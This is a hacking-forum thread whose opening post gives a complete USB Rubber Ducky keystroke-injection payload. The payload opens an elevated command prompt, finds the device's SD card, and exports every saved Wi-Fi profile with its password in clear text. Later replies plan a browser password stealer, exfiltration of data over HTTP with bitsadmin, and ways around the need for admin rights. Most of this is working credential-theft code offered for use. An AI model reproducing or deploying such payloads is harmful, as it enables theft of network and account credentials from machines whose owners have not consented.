Jump to content

[Payload] Wi-Fi password stealer saving to SD.

crashie

By crashie
in Classic USB Rubber Ducky

 Share

Recommended Posts

crashie Newbie

crashie

Posted
Posted (edited)
This stealer script exports all the Wi-Fi passwords to the SD mounted in the rubber ducky.
Requirement: This one is to be used with Twin Duck firmware. 
DELAY 1000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
DELAY 500
ENTER
DELAY 300
STRING netsh wlan export profile folder=%myd%\ key=clear 
ENTER
DELAY 500
STRING exit
ENTER
Edited by crashie
Link to comment
Share on other sites
crashie Newbie

crashie

Posted
  • Author
Posted

Thanks! I've been playing around all weekend and are getting the hang of things now :P

I am currently working on a browser stealer which is a command-line only one. A small executable that does not need any admin rights of course, it will be executed from the SD and export a .txt to the SD. There are many browser stealers out there but some get flagged by the AV's like nirsofts and others are to heavy in size because of a GUI..

And btw, take a look at the bitsadmin payload.. sending files over HTTP :P

Will continue to put up all my work here, was first thinking of putting them on my website but hey.. it's all for the community :P

/crashie

Great work with these new payloads man! keep it up! :rolleyes:

Link to comment
Share on other sites
crashie Newbie

crashie

Posted
  • Author
Posted

Really excited to see this. Does it require admin rights?

Yeah, sadly enough it does.. the CMD have to run as admin so the local user have to be in that group yes. But I am working on a solution to bypass that.. so you can run it on a regular user account with elevated privileges.

To steal the browser passwords (opera, safari, firefox, chrome) though it's not needed :P I will add that payload later this week when it's finished and tested completely. One version that saves it to the SD and one that send it out over HTTP. Bitsadmin works great for sending stuff over the Internet as HTTP but it requiers an IIS server on the other end.

I am though working on an exploit to also be able to steal the Wi-Fi passwords in clear-text without being admin as I said.. but it will take some time to finish since I'm working on it alone.

But I'll keep posting the results here :)

/crashie

Link to comment
Share on other sites
shutin Newbie

shutin

Posted
Posted

Yeah, sadly enough it does.. the CMD have to run as admin so the local user have to be in that group yes. But I am working on a solution to bypass that.. so you can run it on a regular user account with elevated privileges.

/crashie

Well.. I wrote a script using these basic techniques and it exported just fine since my user was as admin. I think the vast majority of people on windows are single users running with admin so it's actually pretty rare to find someone smart enough to add a local regular user. My problem was I couldn't get wmic to find the DUCKY label and output to my sd card. I will try this script and see if it does the magic.

Link to comment
Share on other sites
crashie Newbie

crashie

Posted
  • Author
Posted

Well.. I wrote a script using these basic techniques and it exported just fine since my user was as admin. I think the vast majority of people on windows are single users running with admin so it's actually pretty rare to find someone smart enough to add a local regular user. My problem was I couldn't get wmic to find the DUCKY label and output to my sd card. I will try this script and see if it does the magic.

Yeah, you're right :P Most of the users run as local admin. The wmic should work great.. works fine here at least :) Also have in mind your keyboard layout so it have the right symbols.. this one won't work with danish, norwegian, swedish layouts because a missing ^ in the properties file..

Link to comment
Share on other sites
  • 6 months later...
waddell Newbie

waddell

Posted
Posted

I'm not able to get this command to export my profile. I've tried this on two different computers but I get a response like "The filename, directory name, or volume label syntax is incorrect." for a command like "netsh wlan export profile key=clear". Anyone else having issues with this? I am logged in as an admin, and I've also tried to run cmd as administrator.

Link to comment
Share on other sites
  • 4 weeks later...
triphazard Newbie

triphazard

Posted
Posted

I was reading through Tim Tomes' website when I found this link and thought of this thread. Why fight with admin rights when you don't need to right? Let windows do the work.

http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html

I plan on checking this out sometime when I get home tomorrow. But if the article is correct(Tim Tomes linked to it, and he's freakin' awesome) those keys aren't protected, they're just obscured a bit in a proprietary way (best security ever), so that settings can still be imported and exported. The reason why it would be this way baffles me, which is why I still intend to check it out for myself. The article was written for Vista when they changed the way windows handles wireless PSKs, which I don't believe has changed again yet. Please correct me if I'm wrong.

Link to comment
Share on other sites
b00stfr3ak Newbie

b00stfr3ak

Posted
Posted

I was reading through Tim Tomes' website when I found this link and thought of this thread. Why fight with admin rights when you don't need to right? Let windows do the work.

http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html

I plan on checking this out sometime when I get home tomorrow. But if the article is correct(Tim Tomes linked to it, and he's freakin' awesome) those keys aren't protected, they're just obscured a bit in a proprietary way (best security ever), so that settings can still be imported and exported. The reason why it would be this way baffles me, which is why I still intend to check it out for myself. The article was written for Vista when they changed the way windows handles wireless PSKs, which I don't believe has changed again yet. Please correct me if I'm wrong.

Hey I have added your idea to my power-ducky toolkit, It should work but I don't have a windows laptop with wireless to test. https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/

Link to comment
Share on other sites
  • 2 weeks later...
UnKn0wnBooof Newbie

UnKn0wnBooof

Posted
Posted

You can't recover wifi keys without admin access. I've already attempted it, aswell as taking a look at some of Microsoft's tutorials on how the encryption angorithm works. It's impossible to recover the keys without the correct permissions. The payload "ULTIMATE DATA THEIF!" does way more than just stealing wifi passwords.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...